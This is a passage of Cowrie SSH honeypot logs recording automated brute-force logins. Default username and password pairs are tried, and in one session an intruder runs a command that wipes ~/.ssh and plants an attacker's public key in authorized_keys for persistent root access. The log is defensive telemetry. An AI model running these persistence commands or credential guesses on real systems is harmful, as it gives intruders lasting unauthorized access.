istp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-09-09T02:57:38.661924Z","src_ip":"212.227.125.160","session":"fe0089fae09f"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"ubuntu","message":"login attempt [ubuntu/ubuntu] failed","sensor":"my-vps","timestamp":"2025-09-09T02:57:39.675035Z","src_ip":"212.227.125.160","session":"fe0089fae09f"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:57:40.968293Z","src_ip":"212.227.125.160","session":"fe0089fae09f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33732,"dst_ip":"1.2.3.4","dst_port":22,"session":"aceb42dc6419","protocol":"ssh","message":"New connection: 212.227.125.160:33732 (1.2.3.4:22) [session: aceb42dc6419]","sensor":"my-vps","timestamp":"2025-09-09T02:57:41.035387Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T02:57:41.204485Z","src_ip":"212.227.125.160","session":"aceb42dc6419"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-09-09T02:57:41.205138Z","src_ip":"212.227.125.160","session":"aceb42dc6419"}
{"eventid":"cowrie.login.failed","username":"pi","password":"raspberry","message":"login attempt [pi/raspberry] failed","sensor":"my-vps","timestamp":"2025-09-09T02:57:41.862613Z","src_ip":"212.227.125.160","session":"aceb42dc6419"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:57:42.955158Z","src_ip":"212.227.125.160","session":"aceb42dc6419"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44166,"dst_ip":"1.2.3.4","dst_port":22,"session":"48db35c20907","protocol":"ssh","message":"New connection: 212.227.125.160:44166 (1.2.3.4:22) [session: 48db35c20907]","sensor":"my-vps","timestamp":"2025-09-09T02:57:42.997594Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T02:57:43.084959Z","src_ip":"212.227.125.160","session":"48db35c20907"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-09-09T02:57:43.085949Z","src_ip":"212.227.125.160","session":"48db35c20907"}
{"eventid":"cowrie.session.connect","src_ip":"185.152.45.241","src_port":11874,"dst_ip":"1.2.3.4","dst_port":22,"session":"7422afccf2c4","protocol":"ssh","message":"New connection: 185.152.45.241:11874 (1.2.3.4:22) [session: 7422afccf2c4]","sensor":"my-vps","timestamp":"2025-09-09T02:57:43.089277Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:57:43.090109Z","src_ip":"185.152.45.241","session":"7422afccf2c4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:57:43.153050Z","src_ip":"185.152.45.241","session":"7422afccf2c4"}
{"eventid":"cowrie.login.success","username":"root","password":"Q1","message":"login attempt [root/Q1] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:57:43.413918Z","src_ip":"185.152.45.241","session":"7422afccf2c4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:57:43.531597Z","src_ip":"185.152.45.241","session":"7422afccf2c4"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:57:43.532247Z","src_ip":"185.152.45.241","session":"7422afccf2c4"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:57:43.533288Z","src_ip":"185.152.45.241","session":"7422afccf2c4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:57:43.588248Z","src_ip":"185.152.45.241","session":"7422afccf2c4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:57:43.793400Z","src_ip":"185.152.45.241","session":"7422afccf2c4"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T02:57:43.794086Z","src_ip":"185.152.45.241","session":"7422afccf2c4"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"ubnt","message":"login attempt [ubnt/ubnt] failed","sensor":"my-vps","timestamp":"2025-09-09T02:57:43.835354Z","src_ip":"212.227.125.160","session":"48db35c20907"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T02:57:43.843245Z","src_ip":"185.152.45.241","session":"7422afccf2c4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:57:43.844089Z","src_ip":"185.152.45.241","session":"7422afccf2c4"}
{"eventid":"cowrie.session.connect","src_ip":"185.152.45.241","src_port":11875,"dst_ip":"1.2.3.4","dst_port":22,"session":"27022bbbefbb","protocol":"ssh","message":"New connection: 185.152.45.241:11875 (1.2.3.4:22) [session: 27022bbbefbb]","sensor":"my-vps","timestamp":"2025-09-09T02:57:43.888544Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:57:43.889373Z","src_ip":"185.152.45.241","session":"27022bbbefbb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:57:43.938077Z","src_ip":"185.152.45.241","session":"27022bbbefbb"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T02:57:44.183026Z","src_ip":"185.152.45.241","session":"27022bbbefbb"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:57:45.239011Z","src_ip":"185.152.45.241","session":"27022bbbefbb"}
{"eventid":"cowrie.session.connect","src_ip":"185.152.45.241","src_port":11873,"dst_ip":"1.2.3.4","dst_port":22,"session":"9be4394a16da","protocol":"ssh","message":"New connection: 185.152.45.241:11873 (1.2.3.4:22) [session: 9be4394a16da]","sensor":"my-vps","timestamp":"2025-09-09T02:57:45.283624Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:57:45.284497Z","src_ip":"185.152.45.241","session":"9be4394a16da"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:57:45.328644Z","src_ip":"185.152.45.241","session":"9be4394a16da"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:57:45.563916Z","src_ip":"185.152.45.241","session":"9be4394a16da"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:57:45.608574Z","src_ip":"185.152.45.241","session":"7422afccf2c4"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:57:45.609914Z","src_ip":"185.152.45.241","session":"9be4394a16da"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:57:45.687801Z","src_ip":"212.227.125.160","session":"48db35c20907"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55812,"dst_ip":"1.2.3.4","dst_port":22,"session":"fafd9520d266","protocol":"ssh","message":"New connection: 212.227.125.160:55812 (1.2.3.4:22) [session: fafd9520d266]","sensor":"my-vps","timestamp":"2025-09-09T02:57:45.728818Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T02:57:45.886950Z","src_ip":"212.227.125.160","session":"fafd9520d266"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-09-09T02:57:45.887597Z","src_ip":"212.227.125.160","session":"fafd9520d266"}
{"eventid":"cowrie.login.failed","username":"dahua","password":"dahua","message":"login attempt [dahua/dahua] failed","sensor":"my-vps","timestamp":"2025-09-09T02:57:46.818312Z","src_ip":"212.227.125.160","session":"fafd9520d266"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:57:48.158771Z","src_ip":"212.227.125.160","session":"fafd9520d266"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37742,"dst_ip":"1.2.3.4","dst_port":22,"session":"5cb7db7ff109","protocol":"ssh","message":"New connection: 212.227.125.160:37742 (1.2.3.4:22) [session: 5cb7db7ff109]","sensor":"my-vps","timestamp":"2025-09-09T02:57:48.199728Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T02:57:48.419269Z","src_ip":"212.227.125.160","session":"5cb7db7ff109"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-09-09T02:57:48.420181Z","src_ip":"212.227.125.160","session":"5cb7db7ff109"}
{"eventid":"cowrie.login.failed","username":"administrator","password":"123456","message":"login attempt [administrator/123456] failed","sensor":"my-vps","timestamp":"2025-09-09T02:57:49.217346Z","src_ip":"212.227.125.160","session":"5cb7db7ff109"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:57:50.261336Z","src_ip":"212.227.125.160","session":"5cb7db7ff109"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49116,"dst_ip":"1.2.3.4","dst_port":22,"session":"437921eaf700","protocol":"ssh","message":"New connection: 212.227.125.160:49116 (1.2.3.4:22) [session: 437921eaf700]","sensor":"my-vps","timestamp":"2025-09-09T02:57:50.306925Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T02:57:50.312183Z","src_ip":"212.227.125.160","session":"437921eaf700"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-09-09T02:57:50.357770Z","src_ip":"212.227.125.160","session":"437921eaf700"}
{"eventid":"cowrie.login.failed","username":"administrator","password":"admin","message":"login attempt [administrator/admin] failed","sensor":"my-vps","timestamp":"2025-09-09T02:57:50.763407Z","src_ip":"212.227.125.160","session":"437921eaf700"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:57:51.924421Z","src_ip":"212.227.125.160","session":"437921eaf700"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55802,"dst_ip":"1.2.3.4","dst_port":22,"session":"bf96013a7125","protocol":"ssh","message":"New connection: 212.227.125.160:55802 (1.2.3.4:22) [session: bf96013a7125]","sensor":"my-vps","timestamp":"2025-09-09T02:57:51.984829Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T02:57:52.134498Z","src_ip":"212.227.125.160","session":"bf96013a7125"}
